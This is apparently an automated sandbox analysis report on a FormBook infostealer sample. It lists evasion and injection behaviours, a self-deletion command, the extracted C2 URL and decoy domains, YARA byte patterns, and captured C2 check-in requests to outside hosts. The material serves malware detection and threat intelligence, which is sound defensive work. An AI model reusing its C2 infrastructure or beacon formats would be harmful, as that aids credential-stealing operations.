Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report CtTYTpaAKA.exe

Overview

General Information

Sample Name:CtTYTpaAKA.exe
Analysis ID:510401
MD5:4a640b5abfd52dc70eb962bf9f250714
SHA1:19433ceeaae0f6b678f77e8494a39de9e9d4f870
SHA256:0e636b89393a1581a2e3f4b141c9886bed9c77969569605cdb44b78d94127802
Tags:exe
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • CtTYTpaAKA.exe (PID: 7140 cmdline: 'C:\Users\user\Desktop\CtTYTpaAKA.exe' MD5: 4A640B5ABFD52DC70EB962BF9F250714)
    • CtTYTpaAKA.exe (PID: 5784 cmdline: C:\Users\user\Desktop\CtTYTpaAKA.exe MD5: 4A640B5ABFD52DC70EB962BF9F250714)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 5360 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6600 cmdline: /c del 'C:\Users\user\Desktop\CtTYTpaAKA.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x46c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x41b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x47c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0xac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x6ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x6bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x6b18:$sqlite3text: 68 38 2A 90 C5
    • 0x6c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x6b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x6c53:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 30 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.CtTYTpaAKA.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.CtTYTpaAKA.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.CtTYTpaAKA.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        5.0.CtTYTpaAKA.exe.400000.4.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.0.CtTYTpaAKA.exe.400000.4.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 23 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: CtTYTpaAKA.exeVirustotal: Detection: 13%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORY
          Source: 5.0.CtTYTpaAKA.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.CtTYTpaAKA.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.CtTYTpaAKA.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.CtTYTpaAKA.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: CtTYTpaAKA.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: CtTYTpaAKA.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: cscript.pdbUGP source: CtTYTpaAKA.exe, 00000005.00000002.355160029.0000000001330000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: CtTYTpaAKA.exe, 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, cscript.exe, 0000000A.00000002.559915129.0000000004710000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: CtTYTpaAKA.exe, cscript.exe
          Source: Binary string: cscript.pdb source: CtTYTpaAKA.exe, 00000005.00000002.355160029.0000000001330000.00000040.00020000.sdmp
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 4x nop then pop ebx5_2_00406AB9
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop ebx10_2_00156AB9

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49789 -> 203.170.80.253:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49789 -> 203.170.80.253:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49789 -> 203.170.80.253:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49816 -> 108.167.135.122:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49816 -> 108.167.135.122:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49816 -> 108.167.135.122:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 116.212.126.191:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 116.212.126.191:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49820 -> 116.212.126.191:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.216.2 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.rdoi.top
          Source: C:\Windows\explorer.exeNetwork Connect: 156.240.150.22 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 18.118.119.183 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.isshinn1.com
          Source: C:\Windows\explorer.exeDomain query: www.sosoon.store
          Source: C:\Windows\explorer.exeDomain query: www.24000words.com
          Source: C:\Windows\explorer.exeDomain query: www.creationslazzaroni.com
          Source: C:\Windows\explorer.exeDomain query: www.healthyweekendtips.com
          Source: C:\Windows\explorer.exeNetwork Connect: 45.93.101.51 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.esyscoloradosprings.com
          Source: C:\Windows\explorer.exeNetwork Connect: 157.7.107.193 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.passiverewardssystems.com
          Source: C:\Windows\explorer.exeNetwork Connect: 108.167.135.122 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 203.170.80.253 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 104.233.161.241 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.megacinema.club
          Source: C:\Windows\explorer.exeDomain query: www.thedusi.com
          Performs DNS queries to domains with low reputationShow sources
          Source: DNS query: www.qywyfeo8.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.esyscoloradosprings.com/fqiq/
          Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=e+AZlQHvj0Nkc3ZxJNwaiuJVmPOcAOQ1LYKBIXTaam/aWkR0DWWiTlTQ8bI2AJlImQfa HTTP/1.1Host: www.isshinn1.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?t4=DrMAfIISwi8U79fOFtAc8vb7WUYlKccaGhxOihVWZlb0OyUiTIjpechuj+pZJYn+REB0&7ntl=P0DdOFE HTTP/1.1Host: www.rdoi.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=VbjQ+CrtVqSc6MjyqwiIrbcVi4OLgBoaswazXZOO5Xcx+UM7PWGlfM9NMvQxrE1YfGIg HTTP/1.1Host: www.megacinema.clubConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?t4=S7zufRYckdaRFFMeU2i8sPw6oODMRAGo5BePfs9LVZnwdcptwuHxEcdCnQUJ/1YT2L5I&7ntl=P0DdOFE HTTP/1.1Host: www.passiverewardssystems.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=37G2EJO5ajdFCPilMv01MVSoTtyG1cwu/oJiLg0B75A/3Z+IhDAr8cszuRbw5Svr7Hw7 HTTP/1.1Host: www.sosoon.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?t4=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8PStfGU22/Dk&7ntl=P0DdOFE HTTP/1.1Host: www.esyscoloradosprings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?t4=iMQAtVYJ5rSxYH2x6+rXrM9PD6xR/OhOVeuwgCEnac3/UPHz+dInplYvIFxL5JBy9ykq&7ntl=P0DdOFE HTTP/1.1Host: www.24000words.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDGB1W4+ZaPC+ HTTP/1.1Host: www.healthyweekendtips.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?7ntl=P0DdOFE&t4=t9SsZ/MS+FgAljVT/evJl5FFrjjg4DD8GLJQPa9p2h0JK2Hk2yZve+gJxH10C5UF88V/ HTTP/1.1Host: www.thedusi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 108.167.135.122 108.167.135.122
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 17:14:13 GMTContent-Type: text/htmlContent-Length: 19220Connection: closeServer: ApacheLast-Modified: Mon, 23 Jul 2018 06:31:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 6c 6f 6
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Oct 2021 17:14:19 GMTServer: ApacheContent-Length: 258Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 64 6f 69 2e 74 6f 70 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.rdoi.top Port 80</address></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Tue, 09 Jul 2019 06:18:14 GMTetag: "999-5d2431a6-22b54e502ae80759;;;"accept-ranges: bytescontent-length: 2457date: Wed, 27 Oct 2021 17:14:25 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 